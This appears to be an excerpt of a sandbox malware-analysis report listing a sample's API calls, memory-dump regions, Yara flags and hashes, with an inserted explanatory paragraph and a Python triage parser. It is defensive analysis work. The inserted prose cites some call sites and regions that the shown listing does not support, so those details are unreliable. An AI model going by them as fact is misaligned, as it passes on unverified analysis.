                                                                  • Instruction Fuzzy Hash: 4331C8377342025F9924A6E9749C33BA15BD784648F64485AF003CB34CDEA9CCC14BE3
                                                                  APIs
                                                                  • LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0226704F,022668DC), ref: 02266F40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 22117a57f2c37ddb0e1c410c05554810ba8f25f45c700d5a6f405df4d21d9df6
                                                                  • Instruction ID: 0c009e082aba6111fe3fae39d56b6cec76ca04d6b9ed3612864f7bdba00cbef6
                                                                  • Opcode Fuzzy Hash: 22117a57f2c37ddb0e1c410c05554810ba8f25f45c700d5a6f405df4d21d9df6
                                                                  • Instruction Fuzzy Hash: 49014477B11201AF9754FBF5B49C63B269B5BC0654B044CA9F005C7348EE749C514BE1
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00429CAB
                                                                    • Part of subcall function 004299F1: TlsAlloc.KERNEL32(?,00429CD5,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60,00000000,?,0040E996,00000000), ref: 00429A13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocH_prolog
                                                                  • String ID:
                                                                  • API String ID: 3910492588-0
                                                                  • Opcode ID: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction ID: e3d1adaf2064881ac0a353d79633cd097c0c2aad4d25d7745887e64319261521
                                                                  • Opcode Fuzzy Hash: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction Fuzzy Hash: F4016D35B20112DBDB29AF66F81166E77A2EBD6325F50453FE582D3390DB788C04CB98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 9c44a7ce0103fbbf5f64b070ec749cd0cf775249d9d4a793d843660978a222af
                                                                  • Instruction ID: e9333b6b1f0cb577e31a058f55fc8892b6440b0cafaad97ce58ae9a5fd8b56e1
                                                                  • Opcode Fuzzy Hash: 9c44a7ce0103fbbf5f64b070ec749cd0cf775249d9d4a793d843660978a222af
                                                                  • Instruction Fuzzy Hash: 6BD09EB4D80208FFD780EFA4E946B9DBBB4EB04702F108165EA29A7644E7715A148F56
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 021F182F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 5c273d823698085263809707435d3a4d18e0bdafb60f529b1abdf4c867f6cda8
                                                                  • Instruction ID: 261ca9a0cdc670f9cb6e16334f73c335e60a03c1f083cf9c3855c0dd7ea435e4
                                                                  • Opcode Fuzzy Hash: 5c273d823698085263809707435d3a4d18e0bdafb60f529b1abdf4c867f6cda8
                                                                  • Instruction Fuzzy Hash: 29C04CBA55424CAB8B44DF98E884DAB77EDBB8C610B048549BA2D87604C630F9508BA4
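The entries above read as a table once you know the columns: which APIs a function calls and at what address, which memory dump the function lives in, whether that dump is based on a PE image, and whether the dump has Yara matches. On this page the LoadLibraryW call sites at 022670F2 and 02266F40 and the ExitProcess call at 02265CCB sit in the dump at offset 02260000, which the report marks with Yara matches, while the VirtualFree call at 021F182F sits in the dump at offset 021F1000, which the report marks as not based on a PE. The parser below is an example added to this page, not Joe Sandbox code: it reads these blocks, builds one record per function, and flags functions that run from a region not based on a PE or from a region with Yara matches, giving each call site as an absolute address and as an offset into its dump. The line format is inferred from the rendered report and is an assumption; the sample input is a constructed subset of the entries on this page with the indentation and link labels removed.

```python
"""Parse Joe Sandbox per-function blocks ("APIs" / "Memory Dump Source") and
flag functions that run from memory the report marks as not based on a PE, or
from a region with Yara matches. Example code added by the editor, not Joe
Sandbox tooling; the line format is inferred from the report and is an assumption."""
import re

# Constructed input: a subset of the entries on this page, with the report's
# indentation and "Download File" link labels removed.
SAMPLE = """\
APIs
• LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022668DC), ref: 022670F2
Memory Dump Source
• Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
Yara matches
Similarity
• API ID: LibraryLoad
APIs
• VirtualFree.KERNELBASE(?,?,?), ref: 021F182F
Memory Dump Source
• Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
APIs
• __EH_prolog.LIBCMT ref: 00424A9E
• GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 00424AC8
  • Part of subcall function 00424A57: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 00424A83
Memory Dump Source
• Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
"""

HEADINGS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}
# "• Name.MODULE(args), ref: ADDR" or "• Name.LIBCMT ref: ADDR"; a nested call
# carries the prefix "Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)$")   # "• API ID: ..."


def parse_entries(text):
    """One dict per "APIs" block; 'apis' holds one dict per call site."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "source_file": "", "offset": 0, "based_on_pe": True,
                   "yara_matches": False, "fields": {}}
            entries.append(cur)
        elif cur is None or not line or line in HEADINGS:
            continue
        elif line == "Yara matches":
            cur["yara_matches"] = True
        elif m := API_RE.match(line):
            cur["apis"].append({
                "name": m["name"], "module": m["module"], "args": m["args"] or "",
                "ref": int(m["ref"], 16),                        # absolute call site
                "parent": int(m["parent"], 16) if m["parent"] else None})
        elif m := SOURCE_RE.match(line):
            cur["source_file"] = m["file"]
            cur["offset"] = int(m["offset"], 16)                 # dump region base
            cur["based_on_pe"] = m["pe"] == "true"
        elif m := FIELD_RE.match(line):
            cur["fields"].setdefault(m["key"], []).append(m["val"])
    return entries


def triage(entries):
    """Entries worth a second look, with the reason and each call site given as an
    absolute address plus its offset into the dump region (handy for pivoting)."""
    hits = []
    for e in entries:
        reasons = []
        if not e["based_on_pe"]:
            reasons.append("code runs from memory not backed by a PE image")
        if e["yara_matches"]:
            reasons.append("region has Yara matches")
        if reasons:
            calls = [f"{a['name']} @ {a['ref']:08X} (+{a['ref'] - e['offset']:X})"
                     for a in e["apis"]]
            hits.append({"offset": e["offset"], "reasons": reasons, "apis": calls})
    return hits


if __name__ == "__main__":
    for hit in triage(parse_entries(SAMPLE)):
        print(f"{hit['offset']:08X}: {'; '.join(hit['reasons'])}", *hit["apis"], sep="\n    ")
```

Run over the whole listing, the records from the 00400000 dump (the on-disk image: CRT locale, path and time-zone helpers) drop out of the triage output, and what remains is the set of call sites in the 02260000 and 021F1000 regions, which is where an analyst would start when carving the unpacked code out of the dumps.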
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424A9E
                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 00424AC8
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 00424AD9
                                                                    • Part of subcall function 00424A57: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00424A7C
                                                                    • Part of subcall function 00424A57: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 00424A83
                                                                  • PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 00424B0E
                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 00424B32
                                                                  • CharUpperA.USER32(?,?,?,?), ref: 00424B4A
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 00424B63
                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00424B6F
                                                                  • lstrlenA.KERNEL32(?,?,?,?), ref: 00424B8C
                                                                  • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 00424BAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                  • String ID:
                                                                  • API String ID: 4080879615-0
                                                                  • Opcode ID: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction ID: 4b06695585c640ab3fe26250615955364903dab726ca119cf8fbbfb20b083b72
                                                                  • Opcode Fuzzy Hash: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction Fuzzy Hash: F1317531700128EBDB219FA5EC88BEEBBBCEF84355F4045A6F515E6250C7389E858B58
                                                                  APIs
                                                                  • _TranslateName.LIBCMT ref: 00418D59
                                                                  • _TranslateName.LIBCMT ref: 00418DA2
                                                                  • IsValidCodePage.KERNEL32(00000000,00000082,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418E06
                                                                  • IsValidLocale.KERNEL32(00000001), ref: 00418E1C
                                                                  • _strcat.LIBCMT ref: 00418E5F
                                                                    • Part of subcall function 00418BEC: _strlen.LIBCMT ref: 00418BF2
                                                                    • Part of subcall function 00418BEC: EnumSystemLocalesA.KERNEL32(00418802,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418C0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem_strcat_strlen
                                                                  • String ID: 8:C$Norwegian-Nynorsk
                                                                  • API String ID: 4291917928-2144728078
                                                                  • Opcode ID: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction ID: 2c2c8765f4b236233be1cdb350641c934f88d795d8981d40c2d079dedaed01f1
                                                                  • Opcode Fuzzy Hash: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction Fuzzy Hash: 6A4185B1B41340BBDB30AB61AC81BEB37A5AF65700B15143FE545D62F1DF3988C9862E
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00414AF6
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • _strlen.LIBCMT ref: 00414B68
                                                                  • _strcat.LIBCMT ref: 00414B85
                                                                  • _strncpy.LIBCMT ref: 00414B9E
                                                                    • Part of subcall function 0040E502: __lock.LIBCMT ref: 0040E520
                                                                    • Part of subcall function 0040E502: HeapFree.KERNEL32(00000000,?,00431A60,0000000C,004108CC,00000000,00431B30,00000008,00410901,?,?,?,00410723,00000004,00431B20,00000010), ref: 0040E567
                                                                  • GetTimeZoneInformation.KERNEL32(0043F808,00432298,00000018,004150F8,004322A8,00000008,0040F746,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 00414C07
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F80C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414C95
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0043F860,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,?), ref: 00414CC9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
                                                                  • String ID:
                                                                  • API String ID: 3757401926-0
                                                                  • Opcode ID: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction ID: b88b56355e109a379969b639f8961749b468b39d063f6cbed0312a5d21008a68
                                                                  • Opcode Fuzzy Hash: a12a00952cfbe2cbfe0e02be742bc80dcd0c2f8750305a48b7d58f6abd9f11fa
                                                                  • Instruction Fuzzy Hash: 1B7137319042419EDB28AF29FC85B967BE5E785310F64253BE850E72E1E73C48C2CB5D
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B410
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B422
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B46D
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041B4DC
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041B4FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction ID: bfaabb92e0a3a5bf762b7feaf1de5f82b449aebafdeaeb8c174feb8ae06c27e5
                                                                  • Opcode Fuzzy Hash: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction Fuzzy Hash: B3318D70901229FBCF218F91DD459EF7F75EF09764B20812AF411A6262C7388A91DBE9
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B2E0
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B2F2
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,?,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B31C
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B34B
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041B3B2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041B3D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction ID: ba34957b19bfa83a15de8861c2d6b5f59c3863597e2d4372a0d3dd5a209f6675
                                                                  • Opcode Fuzzy Hash: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction Fuzzy Hash: 48317E7090061DEBCF229F55DD459EF7B75FF48354B24412BF821A2260D33889A1DB99
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 0040355A
                                                                    • Part of subcall function 004262F7: __EH_prolog.LIBCMT ref: 004262FC
                                                                    • Part of subcall function 004262F7: BeginPaint.USER32(?,?,?,?,0041FE9A), ref: 0042632A
                                                                  • SendMessageA.USER32(?,00000027,?,00000000), ref: 00403581
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0040358F
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 00403595
                                                                  • GetClientRect.USER32(?,?), ref: 004035A2
                                                                  • DrawIcon.USER32(?,?,?,?), ref: 004035DA
                                                                    • Part of subcall function 00426352: __EH_prolog.LIBCMT ref: 00426357
                                                                    • Part of subcall function 00426352: EndPaint.USER32(?,?,?,?,0041FEC0,?), ref: 00426374
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                  • String ID:
                                                                  • API String ID: 1530917984-0
                                                                  • Opcode ID: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
                                                                  • Instruction ID: c95341d9d7590c9a11ddb044179971413f278dffb205523bc6025f8df687dda5
                                                                  • Opcode Fuzzy Hash: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
                                                                  • Instruction Fuzzy Hash: 841160B13143019FD224EF7DDC99D5B77A9ABC8214F444A2DF586C3290DA34E8068A65
                                                                  APIs
                                                                    • Part of subcall function 004215CD: __EH_prolog.LIBCMT ref: 004215D2
                                                                    • Part of subcall function 00423C70: GetDlgItem.USER32(?,?), ref: 00423C7D
                                                                    • Part of subcall function 00423DD5: EnableWindow.USER32(?,?), ref: 00423DE2
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 004036BE
                                                                  • listen.WS2_32(?,00000005), ref: 004036FC
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040370C
                                                                    • Part of subcall function 0042C0CB: __EH_prolog.LIBCMT ref: 0042C0D0
                                                                    • Part of subcall function 0042C0CB: inet_addr.WS2_32(?), ref: 0042C10F
                                                                    • Part of subcall function 0042C0CB: gethostbyname.WS2_32(?), ref: 0042C120
                                                                    • Part of subcall function 0042C0CB: htons.WS2_32(?), ref: 0042C137
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040372C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Timer$H_prolog$EnableItemWindowgethostbynamehtonsinet_addrlisten
                                                                  • String ID: Busy now
                                                                  • API String ID: 1258581902-130138695
                                                                  • Opcode ID: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
                                                                  • Instruction ID: 6490c2d23ba4975c4b10ba10ff6ed106fbde2c758548d969700f79071d26b33c
                                                                  • Opcode Fuzzy Hash: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
                                                                  • Instruction Fuzzy Hash: FC31243139072077E9356B72AC97FAE22A65B84B15F40051DB206AF1C1DEADBA41874C
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                  • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0040E622
                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0040E648
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                  • String ID:
                                                                  • API String ID: 4136887677-0
                                                                  • Opcode ID: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction ID: 1d15696ca511e8db17db0566d3fc480254b9efd771fcc7e6bea79be161feb034
                                                                  • Opcode Fuzzy Hash: a1790f47c41936bced6b79c6f2a35fe46a97817065e715ad083577d6fcbb4a13
                                                                  • Instruction Fuzzy Hash: EC31C232E00229EBCF20CBA6DD44AEE7B78EB14354F540C76E901F7290D6768E51DB98
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00412E2A
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412E36
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412E3E
                                                                  • GetTickCount.KERNEL32 ref: 00412E46
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00412E52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: cf6504c454f8728ec9fffd442ed4ca1bfdc48b7cb4d0adf0ca51413743ca7f8e
                                                                  • Instruction ID: 34e95a29f25a6a58a344066bfba814387cfe7ca9964fe92030387c6fd27a6378
                                                                  • Opcode Fuzzy Hash: cf6504c454f8728ec9fffd442ed4ca1bfdc48b7cb4d0adf0ca51413743ca7f8e
